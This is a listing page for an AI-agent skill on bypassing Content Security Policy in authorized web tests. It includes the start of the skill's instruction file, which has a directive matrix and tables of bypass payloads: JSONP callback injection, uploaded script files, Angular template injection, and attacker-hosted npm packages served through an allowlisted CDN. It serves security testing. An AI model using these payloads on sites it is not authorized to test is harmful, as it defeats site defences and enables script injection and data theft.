Csp Bypass Advanced
Authorized security testing when XSS or data exfiltration is blocked by a strict Content Security Policy and you need directive-level bypass paths.
Overview
csp-bypass-advanced is an agent skill for the Ship phase (also Build integrations testing) that documents advanced Content Security Policy bypass and exfiltration techniques for authorized security assessments.
Install
npx skills add https://github.com/yaklang/hack-skills --skill csp-bypass-advancedWhat is this skill?
- Per-directive CSP reference matrix with default-src fallback behavior
- Nonce/hash abuse and trusted CDN exploitation patterns
- Data exfiltration channels when script execution stays blocked
- Cross-links to XSS, dangling markup, CRLF, WAF bypass, and clickjacking skills
- Flags common model mistakes (assuming unsafe-inline without verifying policy)
- CSP directive reference matrix covering default-src, script-src, and related -src directives
- Five related hack-skills routes (XSS, dangling markup, CRLF, WAF bypass, clickjacking)
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your XSS or exfil proof-of-concept stops at the browser because script-src, connect-src, or related directives block execution and outbound channels.
Who is it for?
Builders or testers doing authorized web app pentests, bug bounty, or pre-launch CSP audits on SaaS and extension frontends.
Skip if: Unauthorized testing, teams without a written scope, or non-technical founders who only need a default CSP template without offensive analysis.
When should I use this skill?
XSS or data exfiltration is blocked by CSP and you need policy weaknesses, trusted endpoint abuse, nonce leakage, or exfiltration channels CSP cannot block.
What do I get? / Deliverables
You get a directive-aware bypass and exfiltration playbook tied to real policy gaps, with routing to XSS, dangling markup, CRLF, WAF, and clickjacking skills for the next testing step.
- Directive-level bypass hypothesis list mapped to observed CSP headers
- Recommended follow-on skill routes (XSS, dangling markup, CRLF, WAF, clickjacking)
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
CSP weaknesses are exercised during pre-release and ongoing security review of web apps, not during initial idea or growth copy work. Canonical shelf is ship → security because the skill maps bypass techniques to policy directives before or after launch hardening.
Where it fits
Validate third-party script allowlists while integrating analytics or payment SDKs that tighten script-src.
Run a pre-release CSP audit after enabling strict headers on the staging SaaS frontend.
Re-test policy regressions after a hotfix changes connect-src or frame-ancestors in production.
How it compares
Use for deep CSP weakness mapping during authorized reviews—not as a substitute for setting a strict baseline policy in application code.
Common Questions / FAQ
Who is csp-bypass-advanced for?
Developers and security testers who legally assess web apps where CSP blocks script-based XSS or exfil and need structured bypass research.
When should I use csp-bypass-advanced?
During ship security reviews of staging or production-like builds, when validating a reported XSS after CSP hardening, or when pairing WAF blocks with policy-level gaps before launch.
Is csp-bypass-advanced safe to install?
Review the Security Audits panel on this Prism page and only use the skill inside authorized engagements; offensive content requires strict scope and legal permission.
SKILL.md
READMESKILL.md - Csp Bypass Advanced
# SKILL: CSP Bypass — Advanced Techniques > **AI LOAD INSTRUCTION**: Covers per-directive bypass techniques, nonce/hash abuse, trusted CDN exploitation, data exfiltration despite CSP, and framework-specific bypasses. Base models often suggest `unsafe-inline` bypass without checking if the CSP actually uses it, or miss the critical `base-uri` and `object-src` gaps. ## 0. RELATED ROUTING - [xss-cross-site-scripting](../xss-cross-site-scripting/SKILL.md) for XSS vectors to deliver after CSP bypass - [dangling-markup-injection](../dangling-markup-injection/SKILL.md) when CSP blocks scripts but HTML injection exists — exfiltrate without JS - [crlf-injection](../crlf-injection/SKILL.md) when CRLF can inject CSP header or steal nonce via response splitting - [waf-bypass-techniques](../waf-bypass-techniques/SKILL.md) when both WAF and CSP must be bypassed - [clickjacking](../clickjacking/SKILL.md) when CSP lacks `frame-ancestors` — clickjacking still possible --- ## 1. CSP DIRECTIVE REFERENCE MATRIX | Directive | Controls | Default Fallback | |---|---|---| | `default-src` | Fallback for all `-src` directives not explicitly set | None (browser default: allow all) | | `script-src` | JavaScript execution | `default-src` | | `style-src` | CSS loading | `default-src` | | `img-src` | Image loading | `default-src` | | `connect-src` | XHR, fetch, WebSocket, EventSource | `default-src` | | `frame-src` | iframe/frame sources | `default-src` | | `font-src` | Font loading | `default-src` | | `object-src` | `<object>`, `<embed>`, `<applet>` | `default-src` | | `media-src` | `<audio>`, `<video>` | `default-src` | | `base-uri` | `<base>` element | **No fallback** — unrestricted if absent | | `form-action` | Form submission targets | **No fallback** — unrestricted if absent | | `frame-ancestors` | Who can embed this page (replaces X-Frame-Options) | **No fallback** — unrestricted if absent | | `report-uri` / `report-to` | Where violation reports are sent | N/A | | `navigate-to` | Navigation targets (limited browser support) | **No fallback** | **Critical insight**: `base-uri`, `form-action`, and `frame-ancestors` do NOT fall back to `default-src`. Their absence is always a potential bypass vector. --- ## 2. BYPASS TECHNIQUES BY DIRECTIVE ### 2.1 `script-src 'self'` The app only allows scripts from its own origin. Bypass vectors: | Vector | Technique | |---|---| | JSONP endpoints | `<script src="/api/jsonp?callback=alert(1)//"></script>` — JSONP reflects callback as JS | | Uploaded JS files | Upload `.js` file (e.g., avatar upload accepts any extension) → `<script src="/uploads/evil.js"></script>` | | DOM XSS sinks | Find DOM sinks (innerHTML, eval, document.write) in existing same-origin JS — inject via URL fragment/param | | Angular/Vue template injection | If framework is loaded from `'self'`, inject template expressions: `{{constructor.constructor('alert(1)')()}}` | | Service Worker | Register SW from same origin → intercept and modify responses | | Path confusion | `<script src="/user-content/;/legit.js">` — server returns user content due to path parsing, but URL matches `'self'` | ### 2.2 `script-src` with CDN Whitelist ``` script-src 'self' *.googleapis.com *.gstatic.com cdn.jsdelivr.net ``` | Whitelisted CDN | Bypass | |---|---| | `cdnjs.cloudflare.com` | Host arbitrary JS via CDNJS (find lib with callback/eval): `angular.js` → template injection | | `cdn.jsdelivr.net` | jsdelivr serves any npm package or GitHub file: `cdn.jsdelivr.net/npm/attacker-package@1.0.0/evil.js` | | `*.googleapis.com` | Google JSONP endpoints, Google Maps callback parameter | | `unpkg.com` | Same as jsdelivr — serves arbitrary npm packages | | `*.cloudfront.net` | Cloud